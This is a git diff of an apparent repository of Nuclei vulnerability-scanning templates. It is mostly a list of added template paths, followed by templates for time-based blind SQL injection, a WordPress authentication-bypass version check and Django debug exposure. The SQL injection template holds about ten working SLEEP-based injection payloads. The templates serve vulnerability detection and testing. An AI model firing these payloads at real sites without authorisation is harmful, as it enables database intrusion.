./poc/cve/CVE-2024-43320-7a90f649b86cc56b7a348322fbac253a.yaml ./poc/cve/CVE-2024-43320.yaml ./poc/cve/CVE-2024-43321-96ff47f665eb548628bdc9a031d6d70f.yaml +./poc/cve/CVE-2024-43321.yaml ./poc/cve/CVE-2024-43322-7ad3832de8b95672975dfcfb60f3598f.yaml +./poc/cve/CVE-2024-43322.yaml ./poc/cve/CVE-2024-43323-1e55a206c0d1e018c5ca8cb550ad6b43.yaml ./poc/cve/CVE-2024-43323.yaml ./poc/cve/CVE-2024-43324-f70541b1201ac529a1d78e7fc9af3a3e.yaml @@ -40180,7 +40244,9 @@ ./poc/cve/CVE-2024-43326-24f0ba897b67329ec3ddf6753f94ed32.yaml ./poc/cve/CVE-2024-43326.yaml ./poc/cve/CVE-2024-43327-8726b3a0797315fcc152dad280cbac4b.yaml +./poc/cve/CVE-2024-43327.yaml ./poc/cve/CVE-2024-43328-732c7a81ff60a18d2ff887b256fba242.yaml +./poc/cve/CVE-2024-43328.yaml ./poc/cve/CVE-2024-43329-67a50fee28efbf96992a3faa792ae691.yaml ./poc/cve/CVE-2024-43329.yaml ./poc/cve/CVE-2024-4333-f46d8860d5d05aeb17e4da3bc1c85b85.yaml @@ -40193,6 +40259,7 @@ ./poc/cve/CVE-2024-43332-53d4557dc08feb794f7aa79a5132bebf.yaml ./poc/cve/CVE-2024-43332.yaml ./poc/cve/CVE-2024-43335-d46b713e90a8332ac8b26c7a7126c9a0.yaml +./poc/cve/CVE-2024-43335.yaml ./poc/cve/CVE-2024-43336-28f522c815326c862a095ad99702db7f.yaml ./poc/cve/CVE-2024-43336.yaml ./poc/cve/CVE-2024-43337-d59a162bda0a92fcb5cbdc9c17791b8c.yaml @@ -40206,24 +40273,33 @@ ./poc/cve/CVE-2024-43341-7cb78fbac960da5bc11a78009c156b3f.yaml ./poc/cve/CVE-2024-43341.yaml ./poc/cve/CVE-2024-43342-3188eb24eebca6379b805dcc2fd53688.yaml +./poc/cve/CVE-2024-43342.yaml ./poc/cve/CVE-2024-43343-bd86d015b232e15272dc87f2bcd25950.yaml ./poc/cve/CVE-2024-43343.yaml ./poc/cve/CVE-2024-43344-dd2bfc771cca501ba1c20aa66e532070.yaml +./poc/cve/CVE-2024-43344.yaml ./poc/cve/CVE-2024-43345-818187bf525840885c083c5886f89859.yaml +./poc/cve/CVE-2024-43345.yaml ./poc/cve/CVE-2024-43346-461457ac208690c9e7435e5f9cf93bf1.yaml +./poc/cve/CVE-2024-43346.yaml ./poc/cve/CVE-2024-43347-0ff8bf2832d5ae37d05ab294908e3044.yaml ./poc/cve/CVE-2024-43347.yaml ./poc/cve/CVE-2024-43348-1d80aee807a5a09c59890436b5a4ba06.yaml +./poc/cve/CVE-2024-43348.yaml ./poc/cve/CVE-2024-43349-7fa6ced0e3688a0b29dd0f4527ae5d77.yaml ./poc/cve/CVE-2024-43349.yaml ./poc/cve/CVE-2024-4335-b652f11b1fd244c356f7f9040d2d61fc.yaml ./poc/cve/CVE-2024-4335.yaml ./poc/cve/CVE-2024-43350-7658ea1ea1a448ef16e7448bb1e7b7a3.yaml +./poc/cve/CVE-2024-43350.yaml ./poc/cve/CVE-2024-43351-4309475ec19267ac7d3446460f31cb63.yaml ./poc/cve/CVE-2024-43351.yaml ./poc/cve/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml +./poc/cve/CVE-2024-43352.yaml ./poc/cve/CVE-2024-43353-f420c4e69c0e2367aa76bcdf09d1f8d5.yaml +./poc/cve/CVE-2024-43353.yaml ./poc/cve/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml +./poc/cve/CVE-2024-43354.yaml ./poc/cve/CVE-2024-43355-aaaae66dd8d3768a39f3d3ed3c2c4630.yaml ./poc/cve/CVE-2024-43355.yaml ./poc/cve/CVE-2024-43356-05ef8f8be0b196ca83c544147054d339.yaml @@ -40254,6 +40330,7 @@ ./poc/cve/CVE-2024-4356-ac59816e5a220379cae065e7ced8ca1c.yaml ./poc/cve/CVE-2024-4356.yaml ./poc/cve/CVE-2024-4358.yaml +./poc/cve/CVE-2024-4359-739b7c6397af07930a602ed827679ba1.yaml ./poc/cve/CVE-2024-4359-a02da093773a725f098d0f6b3982b1f5.yaml ./poc/cve/CVE-2024-4359.yaml ./poc/cve/CVE-2024-4360-2ce554962ceb2089ac94ef643f6a051a.yaml @@ -41043,6 +41120,7 @@ ./poc/cve/CVE-2024-5501-ef276788ff5605e6f36a518160e844c2.yaml ./poc/cve/CVE-2024-5501.yaml ./poc/cve/CVE-2024-5502-46f49a6a29c567a0601ab29368ea1138.yaml +./poc/cve/CVE-2024-5502.yaml ./poc/cve/CVE-2024-5503-19d06aa0a465a31a35fc811375db77be.yaml ./poc/cve/CVE-2024-5503-22284592e7f2d4be691954a9ef8c96d2.yaml ./poc/cve/CVE-2024-5503.yaml @@ -41610,6 +41688,7 @@ ./poc/cve/CVE-2024-6489.yaml ./poc/cve/CVE-2024-6491-077c7077f2470ec50c66a49785e52870.yaml ./poc/cve/CVE-2024-6491.yaml +./poc/cve/CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9.yaml ./poc/cve/CVE-2024-6494-1f03219d59ff7e715b118bf84690f350.yaml ./poc/cve/CVE-2024-6494.yaml ./poc/cve/CVE-2024-6495-7f7d4d9be9d13fb4035edaa3d3829c0a.yaml @@ -41620,6 +41699,7 @@ ./poc/cve/CVE-2024-6497.yaml ./poc/cve/CVE-2024-6498-2ab2ecf188af29e491c09cc5e16d6c6a.yaml ./poc/cve/CVE-2024-6498.yaml +./poc/cve/CVE-2024-6499-506582290ab27969bbad70e6796d3810.yaml ./poc/cve/CVE-2024-6500-76d6d82cf0d857f1f99bb5f0649b9e93.yaml ./poc/cve/CVE-2024-6500-e8578bf41793cff7e63bbe53d1903e0e.yaml ./poc/cve/CVE-2024-6500.yaml @@ -41701,6 +41781,7 @@ ./poc/cve/CVE-2024-6599-9ad4db4a6e6fd3c87c5199e80410875f.yaml ./poc/cve/CVE-2024-6599-aa457f52df54a859bbebb756c962b901.yaml ./poc/cve/CVE-2024-6599.yaml +./poc/cve/CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65.yaml ./poc/cve/CVE-2024-6621-02b2446a68489e575b652c2201b7d541.yaml ./poc/cve/CVE-2024-6621.yaml ./poc/cve/CVE-2024-6624-3e8f54a8f5a599fccb32276f2c459503.yaml @@ -41711,6 +41792,7 @@ ./poc/cve/CVE-2024-6627.yaml ./poc/cve/CVE-2024-6629-d16f070910ae811c719a92ea7113c3c7.yaml ./poc/cve/CVE-2024-6629.yaml +./poc/cve/CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml ./poc/cve/CVE-2024-6634-1294d62a2e83c6ca71566c3b267c34d2.yaml ./poc/cve/CVE-2024-6634.yaml ./poc/cve/CVE-2024-6635-0f3174f37f221bf395fa03e4aca4837b.yaml @@ -41727,8 +41809,10 @@ ./poc/cve/CVE-2024-6660.yaml ./poc/cve/CVE-2024-6661-865ee81f979d667850ff2bc7887f6239.yaml ./poc/cve/CVE-2024-6661.yaml +./poc/cve/CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625.yaml ./poc/cve/CVE-2024-6666-f524b500b74a1c90be50f56d9d664783.yaml ./poc/cve/CVE-2024-6666.yaml +./poc/cve/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml ./poc/cve/CVE-2024-6668-6a6e2b0e2761e93d3ce06e929012b06f.yaml ./poc/cve/CVE-2024-6668.yaml ./poc/cve/CVE-2024-6669-1f8f47157f2608b3fb02a0319a35eb1c.yaml @@ -41903,6 +41987,7 @@ ./poc/cve/CVE-2024-7257.yaml ./poc/cve/CVE-2024-7258-7733e570fd91ef0e0dd37c76462776c5.yaml ./poc/cve/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml +./poc/cve/CVE-2024-7258.yaml ./poc/cve/CVE-2024-7291-9e11faff80d98ce3a78b182e2348528f.yaml ./poc/cve/CVE-2024-7291.yaml ./poc/cve/CVE-2024-7301-b82f30bc7f77018db154ad54534c5d05.yaml @@ -41913,6 +41998,7 @@ ./poc/cve/CVE-2024-7317.yaml ./poc/cve/CVE-2024-7350-fae9f5c8afaa9888e7d61c55abf3bb9e.yaml ./poc/cve/CVE-2024-7350.yaml +./poc/cve/CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250.yaml ./poc/cve/CVE-2024-7353-51d3774cc31ba9c09e3ef4a4a7c21d55.yaml ./poc/cve/CVE-2024-7353.yaml ./poc/cve/CVE-2024-7355-464a77ba558154888cf73a5cab0a6cc4.yaml @@ -41962,10 +42048,12 @@ ./poc/cve/CVE-2024-7556-b7fed9351bafa7783a59e9c29c4c745a.yaml ./poc/cve/CVE-2024-7556.yaml ./poc/cve/CVE-2024-7559-0036d3af189dfdcdecf071d33e7a3e17.yaml +./poc/cve/CVE-2024-7559.yaml ./poc/cve/CVE-2024-7560-ce54c359794ac142d8dfa3e7571236b5.yaml ./poc/cve/CVE-2024-7560.yaml ./poc/cve/CVE-2024-7561-dd941493ec03049c383c879de09e421d.yaml ./poc/cve/CVE-2024-7561.yaml +./poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml ./poc/cve/CVE-2024-7574-003dab2f041ca334b519548f81f66762.yaml ./poc/cve/CVE-2024-7574.yaml ./poc/cve/CVE-2024-7588-72d4c65f8b4a3c39e85f33895621e123.yaml @@ -41989,7 +42077,9 @@ ./poc/cve/CVE-2024-7649-411c4289e1354f2a4fd575707a009990.yaml ./poc/cve/CVE-2024-7649.yaml ./poc/cve/CVE-2024-7651-54b05056620424ffb4dfd689f232601b.yaml +./poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml ./poc/cve/CVE-2024-7651.yaml +./poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml ./poc/cve/CVE-2024-7689-f3a5e607572c3ebe82d6cfc65f846263.yaml ./poc/cve/CVE-2024-7689.yaml ./poc/cve/CVE-2024-7690-8d65eb5cdc8a149b1d94856146905574.yaml @@ -42022,6 +42112,7 @@ ./poc/cve/CVE-2024-7850.yaml ./poc/cve/CVE-2024-7854-c405929374c8ffa2432434eb86f570c7.yaml ./poc/cve/CVE-2024-7854.yaml +./poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml ./poc/cve/CVE_2024_0195.yaml @@ -54055,6 +54146,7 @@ ./poc/favicon/favicon-detection-7445.yaml ./poc/favicon/favicon-detection-7446.yaml ./poc/favicon/favicon-detection.yaml +./poc/favicon/favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml ./poc/favicon/favicon-rotator-6f8bd28dbfbd78a39c26211650d54ded.yaml ./poc/favicon/favicon-rotator.yaml ./poc/favicon/favicon-switcher-87d4523b4710268d91b0abc72f0e31c5.yaml @@ -55593,6 +55685,8 @@ ./poc/header/header-command-injection.yaml ./poc/header/header-enhancement-8ca1ca4a446ea27e1e50c6dcc62fa72b.yaml ./poc/header/header-enhancement.yaml +./poc/header/header-footer-code-08ebf57284e81768e19b2643c32c71af.yaml +./poc/header/header-footer-code-afbd01983360416a12cb28f807e89a8d.yaml ./poc/header/header-footer-code-manager-7e2fc078474ed72dc728c58a336de1d9.yaml ./poc/header/header-footer-code-manager-9cceddacd09591436f7c8d516629bf6f.yaml ./poc/header/header-footer-code-manager-b245f6dc3002019cd3f58800860207f5.yaml @@ -64790,6 +64884,7 @@ ./poc/other/bitformpro-c1951a840a2ea27fbc40d83eac2e0432.yaml ./poc/other/bitformpro-d139e243b64b91b847d04cde6b5cce90.yaml ./poc/other/bitformpro-d755f86f5f98181fb2d499fd64b215af.yaml +./poc/other/bitformpro.yaml ./poc/other/bithighway-product.yaml ./poc/other/bitkeeper.yaml ./poc/other/bitly.yaml @@ -67608,6 +67703,7 @@ ./poc/other/complianz-gdpr-premium.yaml ./poc/other/complianz-gdpr.yaml ./poc/other/compose-find.yaml +./poc/other/compute-links.yaml ./poc/other/computer-repair-shop-0dc1141a40b6ac402337852cc158d793.yaml ./poc/other/computer-repair-shop-34ea74e81a4828837f1c1298c9543ed7.yaml ./poc/other/computer-repair-shop-89299e4538c620735b104dd6327e582d.yaml @@ -68808,6 +68904,7 @@ ./poc/other/custom-options-plus.yaml ./poc/other/custom-page-templates-by-vegacorp-ed8b780e27b1b65633e7aabaac5e4aad.yaml ./poc/other/custom-page-templates-by-vegacorp.yaml +./poc/other/custom-permalinks-44331c84afd644601efc55a9e5863103.yaml ./poc/other/custom-permalinks-6e5ffde32e143b805c24b167ffb23885.yaml ./poc/other/custom-permalinks-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/custom-permalinks-d4ae105c321d1a9fb9b80fb4829023ad.yaml @@ -69322,6 +69419,7 @@ ./poc/other/devices.yaml ./poc/other/devrant.yaml ./poc/other/devto.yaml +./poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml ./poc/other/dexs-pm-system-868efdaccc5f16808a6fb06fe3a1cbec.yaml ./poc/other/dexs-pm-system-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/dexs-pm-system-f0982fd918eb9ba0d5bc8bd0faec3225.yaml @@ -69463,6 +69561,7 @@ ./poc/other/discy.yaml ./poc/other/disneyplus-phish.yaml ./poc/other/display-a-meta-field-as-block-3651ac54124280b3e2d4d7a808a8f468.yaml +./poc/other/display-a-meta-field-as-block.yaml ./poc/other/display-admin-page-on-frontend-6c0fa46386393b85d0ad0c373ab077eb.yaml ./poc/other/display-admin-page-on-frontend.yaml ./poc/other/display-custom-post-aa757b5702d208e7dc541f210bf378bd.yaml @@ -74072,6 +74171,7 @@ ./poc/other/giveaway-1d9e0bf21577ede31febad46bce13674.yaml ./poc/other/giveaway.yaml ./poc/other/givingpress-lite-f13848717586edd56855949bd81c07fd.yaml +./poc/other/givingpress-lite.yaml ./poc/other/gkrellm.yaml ./poc/other/glass-b3268283daf190fd77277f208bd83ee4.yaml ./poc/other/glass.yaml @@ -74473,6 +74573,7 @@ ./poc/other/gutenslider-plugin.yaml ./poc/other/gutenslider.yaml ./poc/other/gutentor-d377e101a76164370c9cc0ec45a485ee.yaml +./poc/other/gutentor.yaml ./poc/other/gutenverse-40a79e4610379f5cd721264ce32ca881.yaml ./poc/other/gutenverse-6f744d9cd8863d765631de4d3721f56e.yaml ./poc/other/gutenverse-d18f386a56dccce0e578f26d0a128ebd.yaml @@ -75013,6 +75114,7 @@ ./poc/other/hqtheme-extra-plugin.yaml ./poc/other/hqtheme-extra.yaml ./poc/other/hr-management-eb3b99f576f6e9904bb734d15faf495b.yaml +./poc/other/hr-management.yaml ./poc/other/hreflang-manager-lite-4fdca8511452f1b9eaf9cfabe504c2f4.yaml ./poc/other/hreflang-manager-lite-c79e04798382f59535d810f01cec980c.yaml ./poc/other/hreflang-manager-lite-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -75576,6 +75678,8 @@ ./poc/other/imagerecycle-pdf-image-compression-09234a10f0a73301163efb33488d8f40.yaml ./poc/other/imagerecycle-pdf-image-compression-25ca6258ba26d4aa6efd9c033515cbd6.yaml ./poc/other/imagerecycle-pdf-image-compression-68818ede461c0658e1b76bc01df4841a.yaml +./poc/other/imagerecycle-pdf-image-compression-76fdeef266854108ceda8d0e46474378.yaml +./poc/other/imagerecycle-pdf-image-compression-7b8181a7be59fef3323111e90fb3e895.yaml ./poc/other/imagerecycle-pdf-image-compression-8d61374692407f29c3794cb06b90237f.yaml ./poc/other/imagerecycle-pdf-image-compression-8e08eeb3b1a1291c3a2ceea6474c0baa.yaml ./poc/other/imagerecycle-pdf-image-compression-9ca66671490c274b708953b237afd4f4.yaml @@ -76779,6 +76883,7 @@ ./poc/other/kbslider-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/kbslider-plugin.yaml ./poc/other/kbslider.yaml +./poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml ./poc/other/kd-coming-soon-2265a234dfded05f01d36b926bceb429.yaml ./poc/other/kd-coming-soon.yaml ./poc/other/kedacom-dvr接入网关.yaml @@ -78667,6 +78772,7 @@ ./poc/other/maxbuttons-4cd8e1d07c24433f81b2881428158931.yaml ./poc/other/maxbuttons-4f03bd0c0caa4c1e80d6f93954f270a3.yaml ./poc/other/maxbuttons-539c47514cbc9de43b420d67a8fbe903.yaml +./poc/other/maxbuttons-64ecf3c81675d9335f44728b57cd5ada.yaml ./poc/other/maxbuttons-77b4962931560c0b9835b520a08e8262.yaml ./poc/other/maxbuttons-b7fd66fddae5690f181f58582d0e793c.yaml ./poc/other/maxbuttons-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -83350,6 +83456,7 @@ ./poc/other/pure-chat.yaml ./poc/other/puridiom.yaml ./poc/other/purity-of-soul-eb9462c64668d462d768e2cde373e11a.yaml +./poc/other/purity-of-soul.yaml ./poc/other/purosa-b49dafa9501f406e94b1c544d3cb4ee0.yaml ./poc/other/purosa.yaml ./poc/other/purus-76c6b84ccd9f6bd60eada03675ff7bce.yaml @@ -84367,6 +84474,7 @@ ./poc/other/responsive-add-ons.yaml ./poc/other/responsive-b35acf8634721bd8b2254b89aad90bd4.yaml ./poc/other/responsive-block-editor-addons-cb81193d1b4184fab4fc973bfc5493ba.yaml +./poc/other/responsive-block-editor-addons.yaml ./poc/other/responsive-c567878f616fa78cef0a6bc18a4ad518.yaml ./poc/other/responsive-category-slider.yaml ./poc/other/responsive-column-widgets-10174a5bcac9bad47e8550b3d07ca19d.yaml @@ -84921,6 +85029,7 @@ ./poc/other/rt-custom-css-page-and-post-plugin.yaml ./poc/other/rt-custom-css-page-and-post.yaml ./poc/other/rt-easy-builder-advanced-addons-for-elementor-1d1da6356ce509687702931ab583a99d.yaml +./poc/other/rt-easy-builder-advanced-addons-for-elementor-32e6bc9d123752add9e4c25d6a9ec9b3.yaml ./poc/other/rt-easy-builder-advanced-addons-for-elementor-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/rt-easy-builder-advanced-addons-for-elementor-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/rt-easy-builder-advanced-addons-for-elementor-plugin.yaml @@ -86244,6 +86353,7 @@ ./poc/other/simple-job-board-4fd2e55b1c3ee85975995bfd883f5d47.yaml ./poc/other/simple-job-board-78ba3267d8cc0c490a80279cd1df5519.yaml ./poc/other/simple-job-board-89de81188a27eb9b10cd5e2de1f40b45.yaml +./poc/other/simple-job-board-9bc0f6e9ceea482ebafd8c072ceaed1f.yaml ./poc/other/simple-job-board-b8c4678c8c8d22ceaed50ffbf977a0f0.yaml ./poc/other/simple-job-board-fc75e846a4b7cfc4113b06125b630f14.yaml ./poc/other/simple-job-board.yaml @@ -87800,6 +87910,7 @@ ./poc/other/striking-r-cc542169b382522dcdc5b994757d4870.yaml ./poc/other/striking-r.yaml ./poc/other/string-locator-0059c7949798057ecdac2004037e9dd7.yaml +./poc/other/string-locator-b6189df65fa837d8ca49f92847869143.yaml ./poc/other/string-locator.yaml ./poc/other/stripchat.yaml ./poc/other/stripe-gateway-6fec145a64c840003085f7492ae5cd7a.yaml @@ -91046,6 +91157,7 @@ ./poc/other/vistered-little-bb15fc0afbd39462bbb4450087669bb5.yaml ./poc/other/vistered-little.yaml ./poc/other/visual-composer-starter-6909271bdc06f95eea673edff022023b.yaml +./poc/other/visual-composer-starter.yaml ./poc/other/visual-form-builder-355778cd9ce14bd4396f412f1952e5bb.yaml ./poc/other/visual-form-builder-5e4ed275d9505a830c27353ad55f8a35.yaml ./poc/other/visual-form-builder-72503cf643bf257391bc9aa733939b75.yaml @@ -91713,6 +91825,7 @@ ./poc/other/whmcs.yaml ./poc/other/whmpress-0d5977b07c81b352711972147990171c.yaml ./poc/other/whmpress-a7309bcc642848ac99c10a4311b79606.yaml +./poc/other/whmpress.yaml ./poc/other/who-hit-the-page-hit-counter-89883786f75e8dc84847064827029c37.yaml ./poc/other/who-hit-the-page-hit-counter-a1e508b6aa56ac41251dd289b91ee3dd.yaml ./poc/other/who-hit-the-page-hit-counter-a8aa7e6da9021bb8e7c5234d4deec357.yaml @@ -95752,6 +95865,7 @@ ./poc/remote_code_execution/order-delivery-date-for-woocommerce-plugin.yaml ./poc/remote_code_execution/order-delivery-date-for-woocommerce.yaml ./poc/remote_code_execution/order-export-and-more-for-woocommerce-229e7a7cf1d14530bd6fed684bfc01b3.yaml +./poc/remote_code_execution/order-export-and-more-for-woocommerce.yaml ./poc/remote_code_execution/order-import-export-for-woocommerce-0e7c6b52509d8bfd0e2b068d7ec9abcb.yaml ./poc/remote_code_execution/order-import-export-for-woocommerce-deb2f706b61560f21bb9bc439367e4c9.yaml ./poc/remote_code_execution/order-import-export-for-woocommerce-fd8db3c088a1878860378bbefce894e8.yaml @@ -100672,6 +100786,7 @@ ./poc/sql/CVE-2023-0731-6b1bdbb604eab6df2c8bf94baac224ee.yaml ./poc/sql/CVE-2023-0768-3c47ee48dbbd62e5b9ceae69cefdfe9b.yaml ./poc/sql/CVE-2023-0891-d7c3047f3679d7a41db56e72a1127815.yaml +./poc/sql/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml ./poc/sql/CVE-2023-0940-68c8a812a7f4d3db6d4f04bb90d0d9a4.yaml ./poc/sql/CVE-2023-0948-264bca3636b9ae9aec54db37004c93eb.yaml ./poc/sql/CVE-2023-0955-81e9f6dd032ddbc4235c39ce2b4b6385.yaml @@ -101732,6 +101847,7 @@ ./poc/sql/CVE-2024-6579-9c7c0b2d8fd09d2e14eb936004e4ddb9.yaml ./poc/sql/CVE-2024-6588-af347ddbbf742df5b2786c5ede788153.yaml ./poc/sql/CVE-2024-6599-9ad4db4a6e6fd3c87c5199e80410875f.yaml +./poc/sql/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml ./poc/sql/CVE-2024-6692-0894f7f570adb2ce646abb2ca918e268.yaml ./poc/sql/CVE-2024-6695-26c3b0fedbe50bc4ddd4f80533e99c22.yaml ./poc/sql/CVE-2024-6710-768106c61e7cc7c723b9dfffd30dbc29.yaml @@ -104040,6 +104156,7 @@ ./poc/sql/kali-forms-198b8bdbd0f5ead8d3fad8b9e445b0ab.yaml ./poc/sql/kb-support-16f8a5e2b5db04d4e374b282d871c4b7.yaml ./poc/sql/kbslider-d1db2f87ba0712e1c037d7fa87dbf0bd.yaml +./poc/sql/kbucket-e74990277ea37a8d6eb0543a824bddb7.yaml ./poc/sql/keep-backup-daily-327b6a6a640edb13bfc96ce69665c4fa.yaml ./poc/sql/kento-post-view-counter-a5fedfc9aea2a7db95d52ff7f7b738e8.yaml ./poc/sql/keron-aio-moffice-sqli.yaml @@ -111324,6 +111441,7 @@ ./poc/wordpress/lean-wp.yaml ./poc/wordpress/leopard-wordpress-offload-media-9c17da68fdae227d54ebf6f8caf803ed.yaml ./poc/wordpress/leopard-wordpress-offload-media-b3f7a58954d39d9abc50308a2c689e43.yaml +./poc/wordpress/leopard-wordpress-offload-media.yaml ./poc/wordpress/lim4wp-6355cc5298b74aae91fbc3add72431cc.yaml ./poc/wordpress/lim4wp-85c0c2a57191d8f1425d9f6b31a4f872.yaml ./poc/wordpress/lim4wp-bdfc359e3288238435c76be20d0c749a.yaml @@ -116925,6 +117043,7 @@ ./poc/wordpress/wp-travel-71620b005bcbf2aee9f61b11bd4c7a65.yaml ./poc/wordpress/wp-travel-a5c7da051e57e878aa92aaa58a089e18.yaml ./poc/wordpress/wp-travel-blocks-2d175246c46ae37e6bc999dc696b78af.yaml +./poc/wordpress/wp-travel-blocks.yaml ./poc/wordpress/wp-travel-engine-5dbbaad444b84209703eb55cd167d8a5.yaml ./poc/wordpress/wp-travel-engine-6477bf18cad6c823db485408d49b337b.yaml ./poc/wordpress/wp-travel-engine-95a033691d3f2bc9fa850c217ca94e96.yaml @@ -118048,6 +118167,7 @@ ./poc/wordpress/wptables-1c8f16aeda7755bc222dcfdc54f2e9b8.yaml ./poc/wordpress/wptables.yaml ./poc/wordpress/wptelegram-widget-a37d54894422d71175e71f451950cb5b.yaml +./poc/wordpress/wptelegram-widget.yaml ./poc/wordpress/wptf-image-gallery-fcb84176c85e1d348e75f01cbfe51bdb.yaml ./poc/wordpress/wptf-image-gallery.yaml ./poc/wordpress/wptools-1d6961a309e74315b43f9b84a7612ac8.yaml diff --git a/poc/auth/BlindSQLAuth.yaml b/poc/auth/BlindSQLAuth.yaml index 6fd8c3c79a..ce5d86554b 100644 --- a/poc/auth/BlindSQLAuth.yaml +++ b/poc/auth/BlindSQLAuth.yaml @@ -1,33 +1,33 @@ -id: time-based-sqli -info: - name: Time-Based Blind SQL Injection - author: Coffinxp/lostsec - severity: Critical - description: Detects time-based blind SQL injection vulnerability -http: - - method: GET - path: - - "{{BaseURL}}" - payloads: - injection: - - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'%2b(select*from(select(sleep(7)))a)%2b'" - - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" - - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" - - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" - - "if(now()=sysdate(),SLEEP(7),0)" - - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - "duration>=7 && duration <=16" +id: time-based-sqli +info: + name: Time-Based Blind SQL Injection + author: KhukuriRimal + severity: Critical + description: Detects time-based blind SQL injection vulnerability +http: + - method: GET + path: + - "{{BaseURL}}" + payloads: + injection: + - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" + - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" + - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" + - "if(now()=sysdate(),SLEEP(7),0)" + - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" + - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" + - "XOR(if(now()=sysdate(),sleep(7),0))XOR" + - "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337" + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "duration>=7 && duration <=16" + condition: and \ No newline at end of file diff --git a/poc/auth/login-as-users.yaml b/poc/auth/login-as-users.yaml new file mode 100644 index 0000000000..089a81f9a9 --- /dev/null +++ b/poc/auth/login-as-users.yaml @@ -0,0 +1,59 @@ +id: login-as-users + +info: + name: > + Login As Users <= 1.4.2 - Authentication Bypass + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/73a0d7a9-374b-430d-a7e5-3c7cdaff5785?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/login-as-users/" + google-query: inurl:"/wp-content/plugins/login-as-users/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,login-as-users,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-as-users/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "login-as-users" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.2') \ No newline at end of file diff --git a/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml b/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml index 3a8d38d44e..05a39f47be 100644 --- a/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml +++ b/poc/cross_site_request_forgery/django-debug-exposure-csrf.yaml @@ -1,25 +1,25 @@ id: django-debug-exposure - info: name: Django Debug Exposure - author: shelled - severity: medium + author: geeknik + severity: high + reference: + - https://twitter.com/Alra3ees/status/1397660633928286208 tags: django,exposure - requests: - method: POST path: - "{{BaseURL}}/admin/login/?next=/admin/" - matchers-condition: and matchers: - type: status status: - - 403 - + - 500 - type: word part: body words: - - 'seeing the help section of this page because you have DEBUG =' - - 'True' + - "DB_HOST" + - "DB_NAME" + - "DJANGO" + - "ADMIN_PASSWORD" condition: and diff --git a/poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml b/poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml new file mode 100644 index 0000000000..2d88fc2615 --- /dev/null +++ b/poc/cve/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml @@ -0,0 +1,59 @@ +id: CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc + +info: + name: > + Custom Permalinks <= 2.6.0 - Authenticated(Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Custom Permalinks plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.6.0 due to insufficient input sanitization and output escaping on 